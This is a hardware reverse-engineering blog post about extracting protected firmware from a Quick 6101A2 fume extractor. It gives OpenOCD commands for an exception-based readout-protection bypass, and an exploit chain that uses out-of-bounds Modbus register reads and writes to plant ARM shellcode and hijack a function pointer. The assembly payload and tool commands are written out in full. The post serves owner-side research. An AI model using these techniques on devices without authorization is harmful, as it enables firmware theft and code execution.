Reverse Engineering Quick 6101A2: Can I have your firmware?

In the previous post, we mapped the Modbus RTU protocol used by the Quick 6101A2 remote controller. The next target is the external tool protocol, but I don't have a compatible tool that speaks it, nor any captured traffic. That makes black-box reversing mostly guesswork. In this post, we find and exploit vulnerabilities in the 6101A2 to extract its firmware, letting us reverse the protocol from actual code instead of trial and error. As Dave Jones says:

Don't turn it on, take it apart!

Show Your Internals

The unit itself is easy to open, with the bottom shell held by a few Phillips head screws. The design is very typical: two boards, one for high power DC motor driving and one for the main controller, plus the motor itself.

Figure: Quick 6101A2 inside view, with the controller board on the left and the motor driver on the right.

We care about the main controller board, and a closer inspection of the ICs tells a clear story:

The main microcontroller is an STM32 clone: Geehy APM32F103CBT6.
The remote controller port is USB-A and connects to the MCU through a MAX3232 RS-232 driver.
The extra tool connector is RJ-11 and runs through an SN65LBC184DR RS-485 transceiver that is isolated with optocouplers.
The board has a 32k ATMLH412 EEPROM that most likely stores user settings.
The 4-pin Serial Wire Debug (SWD) header is located and populated at the top right corner.

Figure: The main controller board.

From the parts alone, we can conclude that the external tool speaks RS-485. The application protocol is still unknown, though. It might be Modbus RTU like the remote controller, but before we throw random bytes at the port, let's check the firmware protections through SWD. I connected the debugger and queried the option bytes to verify the current Readout Protection (RDP) level. We weren't that lucky and the RDP is set to level 1, as shown in the OpenOCD output below.

> stm32f1x options_read 0
device id = 0x20036410
STM32 flash size failed, probe inaccurate - assuming 128k flash
flash size = 128 KiB
option byte register = 0x2a92bfe
write protection register = 0xffffffff
read protection: on
watchdog: software
stop mode: no reset generated upon entry
standby mode: no reset generated upon entry
user data = 0xaa4a
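The raw register value in that output can also be decoded by hand. The sketch below assumes the Geehy part follows the STM32F10x FLASH_OBR bit layout from RM0008 (which is also how OpenOCD interprets it here); the function name `decode_flash_obr` is made up for illustration.

```python
def decode_flash_obr(obr: int) -> dict:
    """Split an STM32F10x-style FLASH_OBR value into its fields.

    Assumed layout (RM0008): bit 0 OPTERR, bit 1 RDPRT, bit 2 WDG_SW,
    bit 3 nRST_STOP, bit 4 nRST_STDBY, bits 10..25 Data0/Data1.
    """
    return {
        "opterr": bool(obr & 0x1),
        "read_protection": bool((obr >> 1) & 0x1),
        "watchdog_software": bool((obr >> 2) & 0x1),
        "no_reset_on_stop": bool((obr >> 3) & 0x1),
        "no_reset_on_standby": bool((obr >> 4) & 0x1),
        "user_data": (obr >> 10) & 0xFFFF,
    }


fields = decode_flash_obr(0x2A92BFE)
for name, value in fields.items():
    print(name, hex(value) if name == "user_data" else value)
```

With the value reported above, the decoded fields line up with the OpenOCD summary: read protection on, software watchdog, and user data 0xaa4a.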

RDP level 1 locks down the flash when a debugger is attached. In this mode, any direct read request triggers a bus error. However, the program can still access it normally when the microcontroller boots from flash.

Exception-Driven Extraction

While researching RDP bypasses, I found an excellent article by Marc Schink and Johannes Obermaier. They show how to leak flash contents by abusing exception handling. In a later paper, they demonstrate that several STM32 clones are vulnerable to the same issue. Geehy parts were not tested, but the results strongly suggested they might be affected too.

The ARM Cortex-M3 core uses two separate buses to access flash. ICode handles instruction fetches, while DCode handles literal loads and debugger access. Schink and Obermaier observed that under RDP1, attaching a debugger blocks flash reads over the data bus, but the instruction bus can still fetch from flash.

Figure: The high-level architecture of the STM32F103 microcontroller.¹

During an exception, the core reads an entry from the vector table and loads it into the program counter (PC). That behavior leaks protected flash data because exception vectors are still fetched from flash over ICode, even with a debugger attached. The attack exploits this by triggering exceptions and recording the resulting PC values.

On its own, leaking the original vector table does not help much. The key is that the debugger can write the Vector Table Offset Register (VTOR), which relocates the table base. By repeatedly moving VTOR and triggering exceptions, we can scan through flash. Some entries are reserved or not tied to real exceptions, so portions remain unreachable, but the technique still recovers roughly 90% of the firmware, depending on table layout.

I did not want to brick the actual controller while testing, so I started with a separate Geehy devboard. My local supplier did not have a devboard with the exact same microcontroller as the fume extractor, but I found a close match in the same family. If the flaw exists there, it is likely present in other models that share the same high-level architecture.

The test setup is simple. I built a dummy firmware with a long ASCII string at 0x5800, flashed it, and enabled RDP level 1. Then I attached a debugger, relocated the vector table to that address, and triggered an exception, as shown in the OpenOCD output below.

> reset halt                   # Reset and halt the CPU
> cortex_m maskisr off         # Disable interrupt masking
> mww 0xE000ED08 0x08005800    # Relocate vector table to point at our test string
> mww 0xE000ED04 0x04000000    # Trigger SysTick exception
> step                         # Single step to trigger the exception
[apm32f1x.cpu] halted due to single-step, current mode: Handler SysTick
xPSR: 0x0100000f pc: 0x4f4f4f4e msp: 0x2000ffe0

After entering the exception handler, the PC register holds 0x4f4f4f4e. Promising: those bytes clearly look like ASCII. The SysTick vector sits at offset 0x3c, so we expect the original image value at 0x5800 + 0x3C = 0x583c. At first glance it looks off, but only by one bit.

$ xxd -e -s 0x583C -l 0x04 test-firmware.bin
0000583c: 4f4f4f4f

On Cortex-M3, the least significant bit is not part of the address loaded into PC because instructions are aligned to at least 16 bits. Instead, the LSB of the vector entry selects the instruction-set state (Thumb) and ends up as the T flag in the Execution Program Status Register (EPSR). We can read it from xPSR in the OpenOCD output. Here, xPSR is 0x0100000f, so bit 24 (the T flag) is set. Therefore the true vector entry is 0x4f4f4f4e | 1 = 0x4f4f4f4f, which matches the test firmware.
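The arithmetic from this test fits in a few lines. This is only a sketch of the bookkeeping, not the extractor's actual code; the helper names are hypothetical.

```python
VECTOR_ENTRY_SIZE = 4      # each vector table entry is one 32-bit word
SYSTICK_EXCEPTION = 15     # SysTick is exception number 15 on Cortex-M
XPSR_T_BIT = 1 << 24       # Thumb state flag inside xPSR


def vector_address(table_base: int, exception_number: int) -> int:
    """Address the core reads when the given exception is taken."""
    return table_base + VECTOR_ENTRY_SIZE * exception_number


def recover_vector_entry(pc: int, xpsr: int) -> int:
    """Rebuild the 32-bit flash word from the PC and the T flag."""
    thumb = 1 if xpsr & XPSR_T_BIT else 0
    return (pc & ~1) | thumb


leaked_from = vector_address(0x08005800, SYSTICK_EXCEPTION)
leaked_word = recover_vector_entry(0x4F4F4F4E, 0x0100000F)
print(hex(leaked_from), hex(leaked_word))
```

For the values in the session above, this yields the flash address 0x0800583c and the word 0x4f4f4f4f.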

That confirms this Geehy microcontroller is vulnerable. Time to try it on the real device. Schink and Obermaier also released stm32f1-firmware-extractor with their original post, which automates the process. Using it, I extracted almost the entire firmware image from my fume extractor.

$ python3 main.py --value 0xaaaaaaaa \
    --binary 0x08000000 32768 |stdbuf -o0 xxd -e
00000000: aaaaaaaa aaaaaaaa 08002c63 0800196d  ........c,..m...
00000010: 08002c61 080005f1 08003295 aaaaaaaa  a,.......2......
00000020: aaaaaaaa aaaaaaaa aaaaaaaa 08000101  ................
00000030: 0800064d aaaaaaaa 08000145 08002c85  M.......E....,..
00000040: 080001b3 080001b3 080001b3 080001b3  ................
00000050: 080001b3 080001b3 080001b3 080001b3  ................
00000060: 080001b3 080001b3 080001b3 080001b3  ................
00000070: 080001b3 080001b3 080001b3 080001b3  ................
00000080: 080001b3 080001b3 080001b3 080001b3  ................
00000090: 080001b3 080001b3 080001b3 0800064f  ............O...
000000a0: 080001b3 080001b3 080001b3 080001b3  ................
000000b0: 08002d51 080001b3 080001b3 080001b3  Q-..............
000000c0: 080001b3 080001b3 080001b3 080001b3  ................
000000d0: 080001b3 0800318d 08003211 080001b3  .....1...2......
000000e0: 080001b3 080001b3 080001b3 d00cf8df  ................
000000f0: f9d2f000 47004800 08003d09 20004888  .....H.G.=...H.
...

In the snippet above, extraction starts at flash base 0x08000000 and scans the full 128 kB region. Any gaps the method cannot recover are filled with 0xaaaaaaaa.
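To get a feel for how much of the image was recovered, the fill words can simply be counted. A minimal sketch, assuming the dump was saved as raw little-endian words; note that any genuine 0xaaaaaaaa word in the firmware would be miscounted as a gap, and `recovered_fraction` is a name invented here.

```python
import struct

FILL_WORD = 0xAAAAAAAA  # value passed to the extractor via --value


def recovered_fraction(image: bytes, fill: int = FILL_WORD) -> float:
    """Fraction of 32-bit words that are not the gap filler."""
    count = len(image) // 4
    if count == 0:
        raise ValueError("image is shorter than one word")
    words = struct.unpack_from(f"<{count}I", image)
    missing = sum(1 for word in words if word == fill)
    return 1 - missing / count


# First four words of the partial dump shown above.
sample = struct.pack("<4I", 0xAAAAAAAA, 0xAAAAAAAA, 0x08002C63, 0x0800196D)
print(f"{recovered_fraction(sample):.0%} of the sample words recovered")
```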

Even though we are missing about ten percent of the firmware, the gaps are spread across the image, which means we are missing a few instructions here and there. That is not a big deal, since it is still enough to reverse engineer the device functionality. However, if we want to modify the existing firmware, we need the full dump. Reflashing means disabling readout protection, which erases the entire flash.

So before digging into the external-tool protocol, I want to first look for vulnerabilities inside the partial dump that could yield a complete firmware extraction. The natural starting point is Modbus RTU handling, since we already know the remote uses it to read and write device state.

Quick Modbus Recap

I already covered Modbus RTU in the previous post, but a short recap helps set the stage. A Modbus frame carries a device address, a function code, a payload, and a CRC. The function code tells the device what to do and how to interpret the payload.

The remote controller uses two functions. Read Holding Registers (function code 0x03) reads a slice of the register map by specifying a start address and quantity. Preset Single Register (function code 0x06) writes one register by supplying its address and new value.
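For reference, both requests are easy to build by hand. The sketch below uses the standard Modbus RTU CRC-16 (initial value 0xFFFF, reflected polynomial 0xA001, low byte sent first); the device address 1 in the example is an assumption, not a value taken from the 6101A2.

```python
import struct


def crc16_modbus(data: bytes) -> int:
    """Standard Modbus RTU CRC-16."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc


def build_frame(address: int, function: int, payload: bytes) -> bytes:
    """Address + function code + payload, followed by the CRC (low byte first)."""
    body = bytes([address, function]) + payload
    return body + struct.pack("<H", crc16_modbus(body))


def read_holding_registers(address: int, start: int, quantity: int) -> bytes:
    # Function 0x03: big-endian start address and register count.
    return build_frame(address, 0x03, struct.pack(">HH", start, quantity))


def preset_single_register(address: int, register: int, value: int) -> bytes:
    # Function 0x06: big-endian register address and new value.
    return build_frame(address, 0x06, struct.pack(">HH", register, value))


print(read_holding_registers(1, 0, 1).hex(" "))
```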

Read Holding Registers Handler

The handler starts by validating the requested register quantity, which cannot be greater than 32, as shown in the disassembly below. That is already interesting because the remote controller never reads more than the first 23 registers.

LDRH    R2, [R1,#(rx_buf+4)] ; qty   = rx_buf[4..5]
LDRH    R0, [R1,#(rx_buf+2)] ; start = rx_buf[2..3]
REV16   R2, R2
REV16   R0, R0
CMP     R2, #0x20            ; qty > 0x20 => send error message
BHI     set_error_code

After the quantity check, the handler does not validate the starting address. It blindly adds the user-controlled start offset to the register-map base and reads the requested number of 16-bit values in a loop.

read_loop:
ADD.W   R6, R10, R0,LSL#1 ; reg_addr = reg_base + 2*start
ADD.W   R7, R3, R4,LSL#1  ; slot     = buff + 2*i
LDRH.W  R6, [R6,#0x40]    ; value    = *(reg_addr + 0x40)
ADDS    R0, R0, #1        ; start++
MOV.W   R12, R6,LSR#8
STRB.W  R12, [R7]         ; slot[0]  = HIBYTE(value)
ADDS    R4, R4, #1        ; i++
STRB    R6, [R7,#1]       ; slot[1]  = LOBYTE(value)

In C, this would look something like this:

uint16_t start = (uint16_t)(rx_buf[2] << 8) | rx_buf[3];
uint16_t qty   = (uint16_t)(rx_buf[4] << 8) | rx_buf[5];

if (qty > 0x20) {
    // send error message
    return;
}

uint16_t i = 0;
while (i < qty) {
    uint16_t value = *(uint16_t*)(reg_base + 2*start + 0x40);
    // ...
    start++;
    i++;
}

This gives us an out-of-bounds read primitive: choose a large start address and the handler walks beyond the register map. Since the start field is 16 bits wide and each register is 16 bits, the reachable span is 2 * 64k = 128k bytes past the map. On this microcontroller, RAM is only 20 kB, so we can effectively dump all of the RAM that follows the map. Annoyingly, the primitive only reaches upward, and RAM at 0x20000000 sits above flash at 0x08000000, so we cannot reach flash through this vulnerability.
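Turning a target address into a Modbus start index is a one-line calculation plus a few sanity checks. A sketch, where `reg0_addr` stands for the address of register 0 (reg_base + 0x40 in the listing above); the concrete value used in the example is made up.

```python
def start_index_for(target: int, reg0_addr: int) -> int:
    """Modbus start index whose register lands on `target`."""
    offset = target - reg0_addr
    if offset < 0:
        raise ValueError("target lies before the register map")
    if offset % 2:
        raise ValueError("target must be halfword aligned")
    index = offset // 2
    if index > 0xFFFF:
        raise ValueError("target is beyond the 16-bit index range")
    return index


HYPOTHETICAL_REG0 = 0x20000100  # illustrative only, not the real map address
print(hex(start_index_for(0x20004390, HYPOTHETICAL_REG0)))
```

Asking for an address in flash, such as 0x08000000, fails the first check, which is the limitation described above.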

Preset Single Register Handler

The write handler starts by extracting the register index and value from the received frame. Unlike the read handler, it validates neither field before passing both straight to a subroutine.

LDRH    R0, [R4,#(rx_buf+2)]  ; reg_idx = rx_buf[2..3]
LDRH    R1, [R4,#(rx_buf+4)]  ; value   = rx_buf[4..5]
REV16   R0, R0
REV16   R1, R1
BL      modbus_write_reg      ; modbus_write_reg(reg_idx, value)

The helper function computes the destination address from the map base and the provided index, then writes the new value to it. Only afterward does it check that the index is below 20, as shown here.

modbus_write_reg:
PUSH.W  {R4-R8,LR}
LDR     R4, =reg_struct_base
ADD.W   R2, R4, R0,LSL#1      ; addr = reg_struct_base + 0x40 + 2*reg_idx
STRH.W  R1, [R2,#0x40]        ; *addr = value
CMP     R0, #0x14             ; reg_idx >= 0x14 => return

Past that validation, there is additional logic that triggers side effects based on the register index, but we can ignore it for now. In C, the handler is roughly:

void modbus_handle_fc06_write_single(void) {
    uint16_t idx = (uint16_t)(rx_buf[2] << 8) | rx_buf[3];
    uint16_t val = (uint16_t)(rx_buf[4] << 8) | rx_buf[5];
    if (modbus_write_reg(idx, val) != 1) {
        // send error message ..
        return;
    }
    // send echo ...
}

int modbus_write_reg(uint16_t idx, uint16_t val) {
    uint16_t* reg_addr = (uint16_t*)(reg_base + 0x40 + 2*idx);
    *reg_addr = val;

    if (idx >= 0x14) {
        return 1;
    }
    // rest of the logic ...
}

So, by providing a large register index, we get an out-of-bounds write past the register map. The constraints mirror the read primitive: we can only target memory after the map, within the same 128 kB span, not arbitrary addresses. With that constraint, can we overwrite anything there that redirects control flow?
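Because each request writes one halfword, copying a byte buffer into RAM means splitting it into (index, value) pairs. A sketch under two assumptions: the core stores halfwords little-endian (as STRH does on this part), and `reg0_addr` is the address of register 0, with a made-up value in the example.

```python
def register_writes(target: int, data: bytes, reg0_addr: int) -> list:
    """Split `data` into (register index, 16-bit value) pairs."""
    offset = target - reg0_addr
    if offset < 0 or offset % 2:
        raise ValueError("target must be halfword aligned and after the map")
    if len(data) % 2:
        raise ValueError("data length must be a multiple of two bytes")
    first = offset // 2
    if first + len(data) // 2 - 1 > 0xFFFF:
        raise ValueError("write runs past the 16-bit index range")
    writes = []
    for i in range(0, len(data), 2):
        # The byte at the lower address becomes the low byte of the value.
        value = data[i] | (data[i + 1] << 8)
        writes.append((first + i // 2, value))
    return writes


HYPOTHETICAL_REG0 = 0x20000100  # illustrative only
pairs = register_writes(0x20004390, bytes.fromhex("72b60a4a"), HYPOTHETICAL_REG0)
print([(hex(i), hex(v)) for i, v in pairs])
```

Each pair then goes out as one function 0x06 request, with the value in big-endian order on the wire.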

Taking The Control

With the write primitive, placing shellcode in RAM is easy. The hard part is control flow: we still need a writable pointer we can hijack, such as a return address or function pointer.

We could hunt candidates with the read primitive, but RDP does not protect RAM, so it is faster to dump full RAM via OpenOCD and inspect it directly. Loading that dump into a disassembler is especially helpful because you can see real runtime values behind globals and indirect references.

> halt
> dump_image ram.bin 0x20000000 0x5000

In the dump, I found a small interface table, located after the register map, that is used for settings persistence. Conveniently, modbus_write_reg reaches this table indirectly to fetch a function pointer when saving updated values to EEPROM. The core flow looks like this:

typedef struct {
    int (*init)(void);
    int (*write)(uint16_t addr, const uint8_t* src, uint16_t len);
    int (*read)(uint16_t addr, uint8_t* dst, uint16_t len);
} SettingInterface;

SettingInterface* settings;

int some_init_func(void) {
    // ...
    settings = (SettingInterface*)malloc(sizeof(SettingInterface));
    if (!settings) return 1;
    settings->init  = eeprom_init;
    settings->write = eeprom_write_buf;
    settings->read  = eeprom_read_buf;
    // ...
}

int modbus_write_reg(uint16_t idx, uint16_t val) {
    uint16_t* reg_addr = (uint16_t*)(reg_base + 0x40 + 2*idx);
    *reg_addr = val;

    if (idx >= 0x14) {
        return 1;
    }

    switch(idx) {
        case 0x01:
            settings->write(0xf0, (const uint8_t*)reg_addr, sizeof(uint16_t));
            break;
        // ...
    }
}

The global settings pointer itself sits at the very start of RAM at 0x20000008, before the register map, so our forward-only write cannot reach it. However, the heap object it points to lands at a higher address that we can reach. A potential attack is to place shellcode in unused RAM, overwrite SettingInterface.write to point at it, and then trigger a legitimate register write that calls write. The table is heap allocated, but the allocation happens so early during initialization that it seems to end up at the same location every time.
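One way to spot such a table in a RAM dump is to look for runs of words that look like Thumb code pointers into flash. This is a rough filter, not the exact matching used by the final tooling, and in a real dump it will also flag things like saved return addresses on the stack. The helper names are hypothetical.

```python
import struct

FLASH_BASE = 0x08000000
FLASH_SIZE = 0x20000
RAM_BASE = 0x20000000


def looks_like_flash_code_pointer(word: int) -> bool:
    """True for odd (Thumb) addresses inside the 128 KiB flash."""
    return FLASH_BASE <= word < FLASH_BASE + FLASH_SIZE and (word & 1) == 1


def find_pointer_tables(ram: bytes, entries: int = 3, ram_base: int = RAM_BASE) -> list:
    """Addresses where `entries` consecutive words all point into flash."""
    hits = []
    for offset in range(0, len(ram) - 4 * entries + 1, 4):
        words = struct.unpack_from(f"<{entries}I", ram, offset)
        if all(looks_like_flash_code_pointer(word) for word in words):
            hits.append(ram_base + offset)
    return hits


# Synthetic snippet: zero padding around three flash code pointers.
table = struct.pack("<3I", 0x080004BD, 0x0800056D, 0x080004E7)
snippet = bytes(16) + table + bytes(16)
print([hex(addr) for addr in find_pointer_tables(snippet, ram_base=0x200042B0)])
```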

You Wouldn't Download A Fume Extractor

To extract the full firmware, we need a small payload that reads flash byte by byte and sends it over the same serial port used by the remote controller. The dumper code itself is straightforward, but a few constraints matter:

We want to disable all maskable interrupts to avoid interruptions from timers, the task scheduler, or other background activity.
The firmware uses the independent watchdog (IWDG), so we need to keep it happy.
We want to busy-loop after a successful dump so we can power down the device in a controlled way.

.syntax unified
.thumb
.global blob_entry
.type blob_entry, %function
.section .text.blob_entry, "ax", %progbits

.equ BUF_ADDR,    0x08000000      @ Flash base address
.equ BUF_LEN,     0x20000         @ Flash size

.equ USART_BASE,  0x40004400      @ USART2 base register

.equ SR_TXE_BIT,  (1<<7)          @ USART_SR.TXE: TX data register empty

.equ IWDG_KR,      0x40003000     @ IWDG key register address (KR)
.equ IWDG_RELOAD,  0xAAAA         @ Reload key: resets watchdog counter

blob_entry:
    cpsid i                       @ Disable all maskable interrupts

    ldr   r2, =USART_BASE         @ r2 = USART2 base
    ldr   r0, =BUF_ADDR           @ r0 = buffer pointer
    ldr   r1, =BUF_LEN            @ r1 = length

    ldr   r4, =IWDG_KR            @ r4 = &IWDG_KR (fixed address)
    ldr   r5, =IWDG_RELOAD        @ r5 = 0xAAAA reload key

1:  cbz   r1, 3f                  @ if len == 0, done

2:  str   r5, [r4, #0]            @ IWDG_KR = 0xAAAA (kick watchdog)
    ldr   r3, [r2, #0]            @ r3 = USART_SR
    tst   r3, #SR_TXE_BIT         @ TXE set?
    beq   2b                      @ wait until TXE==1

    ldrb  r3, [r0], #1            @ r3 = *buf++
    str   r3, [r2, #4]            @ USART_DR = byte

    subs  r1, r1, #1              @ len--
    b     1b

3:  str   r5, [r4, #0]            @ IWDG_KR = 0xAAAA (kick watchdog)
    b     3b                      @ forever loop

The assembly stub can be assembled into flat shellcode with the commands below. The payload.ld linker script is omitted here; it can be found in the GitHub repo alongside the other tooling.

$ arm-none-eabi-as -mcpu=cortex-m3 -mthumb -o payload.o payload.S
$ arm-none-eabi-ld -T payload.ld -o payload.elf payload.o
$ arm-none-eabi-objcopy -O binary payload.elf payload.bin

I wrote a small Python utility, qu-tool.py, to invoke the read/write primitives. First, we copy the payload into RAM. The location does not really matter, so I chose a large zeroed region at 0x20004390.

$ qu-tool.py read --addr 0x20004390 --size 0x40
20004390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
200043A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
200043B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
200043C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

$ qu-tool.py write --addr 0x20004390 --input payload.bin
[*] Wrote 52 bytes starting at 0x20004390

$ qu-tool.py read --addr 0x20004390 --size 0x40
20004390: 72 B6 0A 4A 4F F0 00 60 4F F4 00 31 08 4C 4A F6  r..JO..`O..1.LJ.
200043A0: AA 25 49 B1 13 68 13 F0 80 0F FB D0 10 F8 01 3B  .%I..h.........;
200043B0: 53 60 25 60 01 39 F4 E7 25 60 FD E7 00 44 00 40  S`%`.9..%`...D.@
200043C0: 00 30 00 40 00 00 00 00 00 00 00 00 00 00 00 00  .0.@............

Next, we patch the write function pointer in SettingInterface at 0x200042C4 to point to 0x20004390. Note that the LSB is set to 1 to use the Thumb instruction set.

$ qu-tool.py read --addr 0x200042C0 --size 0x0C
200042C0: BD 04 00 08 6D 05 00 08 E7 04 00 08              ....m.......

$ qu-tool.py write --addr 0x200042C4 --data "91 43 00 20"
[*] Wrote 4 bytes starting at 0x200042C4

$ qu-tool.py read --addr 0x200042C0 --size 0x0C
200042C0: BD 04 00 08 91 43 00 20 E7 04 00 08              .....C. ....
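The four bytes written above are just the shellcode address with the Thumb bit set, stored little-endian. A tiny sketch (the helper name is made up):

```python
import struct


def thumb_pointer_bytes(code_addr: int) -> bytes:
    """Little-endian function pointer with the Thumb bit (LSB) set."""
    return struct.pack("<I", code_addr | 1)


patched = thumb_pointer_bytes(0x20004390)
print(patched.hex(" "))
```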

Finally, we perform a register write that reaches write, and the shellcode sends the full firmware.

$ qu-tool.py trigger --output fw.bin
[+] Triggering
[*] Reading: 0x20000...
[+] Done
[+] Dump stored: fw.bin

$ xxd -e fw.bin | head
00000000: 20004888 08000199 08002c63 0800196d   .H. ....c,..m...
00000010: 08002c61 080005f1 08003295 00000000   a,.......2......
00000020: 00000000 00000000 00000000 08000101   ................
00000030: 0800064d 00000000 08000145 08002c85   M.......E....,..
00000040: 080001b3 080001b3 080001b3 080001b3   ................
00000050: 080001b3 080001b3 080001b3 080001b3   ................
00000060: 080001b3 080001b3 080001b3 080001b3   ................
00000070: 080001b3 080001b3 080001b3 080001b3   ................
00000080: 080001b3 080001b3 080001b3 080001b3   ................
00000090: 080001b3 080001b3 080001b3 0800064f   ............O...

$ shasum fw.bin
3e62524f2d170719374bc639ce9bec35d14fbf5b  fw.bin
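A quick sanity check is to compare the full dump against the earlier partial one: every word the exception-based method recovered should match. A sketch, assuming both images are raw little-endian dumps starting at the flash base and that 0xaaaaaaaa marks the gaps; `conflicting_words` is a hypothetical helper.

```python
import struct

FILL_WORD = 0xAAAAAAAA


def conflicting_words(partial: bytes, full: bytes, fill: int = FILL_WORD) -> list:
    """Byte offsets where a recovered word disagrees with the full dump."""
    count = min(len(partial), len(full)) // 4
    partial_words = struct.unpack_from(f"<{count}I", partial)
    full_words = struct.unpack_from(f"<{count}I", full)
    return [
        index * 4
        for index, (p, f) in enumerate(zip(partial_words, full_words))
        if p != fill and p != f
    ]


# First four words of each dump as shown in the listings above.
partial_head = struct.pack("<4I", 0xAAAAAAAA, 0xAAAAAAAA, 0x08002C63, 0x0800196D)
full_head = struct.pack("<4I", 0x20004888, 0x08000199, 0x08002C63, 0x0800196D)
print(conflicting_words(partial_head, full_head))
```

An empty list means the two dumps agree everywhere the partial one had data.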

The approach above still depends on hardcoded addresses taken from the partial dump, which is not practical, and those addresses can change between firmware versions. So I built a fully self-contained extractor that first leaks the register map base with the read primitive. It increments the register index until replies stop, which indicates that we ran past the end of RAM and triggered an access fault. Knowing the RAM base and size, we compute register_map_base as ram_base + ram_size - 2*last_reg_index - 2. During the same scan, simple pattern matching can locate both the settings table and a safe RAM region for shellcode.
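The base calculation can be sketched as follows. The `probe` callable is a stand-in for "send a one-register read and see whether a reply arrives"; here it is simulated against a made-up map address, so none of the concrete numbers come from the real device.

```python
RAM_BASE = 0x20000000
RAM_SIZE = 0x5000  # 20 kB


def find_last_index(probe, limit: int = 0x10000):
    """Highest register index that still gets a reply, or None."""
    last = None
    for index in range(limit):
        if not probe(index):
            break
        last = index
    return last


def register_map_base(ram_base: int, ram_size: int, last_reg_index: int) -> int:
    """Address of register 0, given the last index that was readable."""
    return ram_base + ram_size - 2 * last_reg_index - 2


# Simulated device: register 0 lives at a hypothetical address, and a read
# succeeds only while the whole halfword stays inside RAM.
SIMULATED_REG0 = 0x20000140


def simulated_probe(index: int) -> bool:
    return SIMULATED_REG0 + 2 * index + 2 <= RAM_BASE + RAM_SIZE


last = find_last_index(simulated_probe)
print(hex(register_map_base(RAM_BASE, RAM_SIZE, last)))
```

In this formula, register_map_base is the address that register index 0 maps to, which is the value the read and write primitives need for their address arithmetic.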

You can find all of the tooling above in the qu6101a2-firmware-extractor repo.

Next Steps

With a full dump, we can now reverse the exact protocol on the external-tool connector. We can also start applying small patches. For example, I would like to remove the motor auto-start behavior on power-up. In the long run, we could even write open-source firmware for it. However, I will save those for future posts.

¹ STMicroelectronics, RM0008 STM32F101xx/102xx/103xx/105xx/107xx Reference Manual